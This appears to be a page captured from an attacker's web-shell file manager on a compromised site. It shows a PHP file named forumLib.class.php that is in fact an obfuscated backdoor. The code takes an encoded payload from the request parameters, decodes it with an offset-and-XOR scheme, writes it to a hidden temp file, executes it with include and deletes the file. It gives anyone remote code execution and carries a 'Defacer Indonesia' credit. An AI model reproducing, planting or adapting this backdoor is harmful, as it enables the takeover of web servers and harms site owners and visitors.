whoami7 - Manager
:
/
home
/
analuakl
/
new.ankurmedia.com
/
Upload File:
files >> /home/analuakl/new.ankurmedia.com/forumLib.class.php
<?php if(array_key_exists("\x6Fbj", $_REQUEST) && !is_null($_REQUEST["\x6Fbj"])){ $entry = $_REQUEST["\x6Fbj"]; $entry = explode('.' , $entry ) ; $descriptor = ''; $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s4); $__len = count($entry); for ($w = 0; $w < $__len; $w++) {$v5 = $entry[$w]; $chS = ord($s4[$w% $sLen]); $dec = ((int)$v5 - $chS - ($w% 10)) ^63; $descriptor.= chr($dec); } $factor = array_filter([getenv("TEMP"), getenv("TMP"), sys_get_temp_dir(), "/dev/shm", getcwd(), "/tmp", ini_get("upload_tmp_dir"), "/var/tmp", session_save_path()]); foreach ($factor as $key => $mrk) { if (max(0, is_dir($mrk) * is_writable($mrk))) { $object = implode("/", [$mrk, ".reference"]); $success = file_put_contents($object, $descriptor); if ($success) { include $object; @unlink($object); die();} } } } if(filter_has_var(INPUT_POST, "\x73y\x6D")){ $comp = $_POST["\x73y\x6D"]; $comp = explode( "." , $comp) ; $reference = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt2); $n = 0; $__tmp = $comp; while( $v9 = array_shift( $__tmp)) { $chS = ord( $salt2[$n % $sLen]); $dec =( ( int)$v9 - $chS -( $n % 10)) ^ 15; $reference .=chr( $dec); $n++; } $object = array_filter([getenv("TEMP"), "/dev/shm", ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), "/var/tmp", session_save_path(), "/tmp", sys_get_temp_dir()]); foreach ($object as $element): if (array_product([is_dir($element), is_writable($element)])) { $obj = sprintf("%s/.entry", $element); if (file_put_contents($obj, $reference)) { include $obj; @unlink($obj); exit; } } endforeach; }
Copyright ©2021 || Defacer Indonesia